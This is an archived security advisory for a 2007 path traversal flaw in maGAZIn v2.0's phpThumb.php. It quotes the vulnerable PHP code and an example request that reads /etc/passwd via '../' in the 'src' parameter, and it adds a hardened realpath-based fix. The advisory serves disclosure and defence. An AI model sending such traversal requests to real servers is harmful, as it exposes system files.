Vendor: maGAZIn
By: Y! Underground Group
CVSS: 5.5 (MEDIUM)
Vulnerability Type: Remote File Disclosure
CWE: 200
Product Name: maGAZIn
Affected Version From: maGAZIn v2.0
Affected Version To: -
Patch Exists: NO
Related CWE: -
CPE: -
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

maGAZIn v2.0 Remote File Disclosure Vulnerability

The vulnerability exists due to improper handling of user-supplied input in the 'src' parameter of the 'phpThumb.php' script. An attacker can exploit this vulnerability to disclose arbitrary files on the target system.

Mitigation:

Update to a patched version of the software or implement input validation to prevent the exploit.

Exploit-DB raw data:

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal   :   maGAZIn v2.0
[!] Download :   http://www.pinkcrow.net/Scripts/gallery.php
[!] Type     :   Remote File Disclosure Vulnerability

---------------------------------------------------------------------

---------------------------------------------------------------------

Vuln Code :  Line (152 - 157)

[Code]
// 'src' is taken straight from the request and appended to DOCUMENT_ROOT
// without canonicalisation, so "../" sequences escape the web root.
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {
	$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));
	fclose($fp);
} else {
	ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);
}
[/Code]

---------------------------------------------------------------------

---------------------------------------------------------------------

Bug :

http://[Target]/[Path]/phpThumb.php?src=[Local File]

Example :

http://Target.ir/Gallery/phpThumb.php?src=../../../etc/passwd

---------------------------------------------------------------------

# milw0rm.com [2007-05-11]
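As an added example (not maGAZIn's or phpThumb's own code), a hardened replacement for the unchecked fopen() quoted in the advisory: it canonicalises the requested path with realpath(), confirms the result still lies under DOCUMENT_ROOT, and allow-lists image extensions. The function name resolve_image_path() and the extension list are assumptions; ErrorImage() is the helper the advisory's snippet already calls.

```php
<?php
// Added example: safe resolution of the 'src' parameter before any file read.
// Assumes served images live below DOCUMENT_ROOT and only raster formats are wanted.

function resolve_image_path(string $docroot, string $src): ?string {
    // Reject empty input and NUL bytes (which can truncate paths in C-level calls).
    if ($src === '' || strpos($src, "\0") !== false) {
        return null;
    }
    $base = realpath($docroot);
    if ($base === false) {
        return null;
    }
    // realpath() resolves '..' and symlinks and returns false for missing files,
    // so "../../../etc/passwd" becomes "/etc/passwd" and fails the check below.
    $real = realpath($base . '/' . ltrim($src, '/'));
    if ($real === false) {
        return null;
    }
    // Containment check: the resolved path must start with "<docroot>/".
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Allow-list extensions so the thumbnailer never reads .php, .htpasswd, etc.
    $ext = strtolower(pathinfo($real, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true)) {
        return null;
    }
    return $real;
}

// Drop-in use in place of the vulnerable fopen() block:
$path = resolve_image_path($_SERVER['DOCUMENT_ROOT'], $_REQUEST['src'] ?? '');
if ($path === null) {
    // Same error path as the original, but without echoing the attacker's input.
    ErrorImage('invalid src', 400, 50);
} else {
    $OriginalImageData = file_get_contents($path);
}
```

Requests carrying traversal sequences now produce the error image instead of file contents, which also makes them easy to log and alert on at the web server.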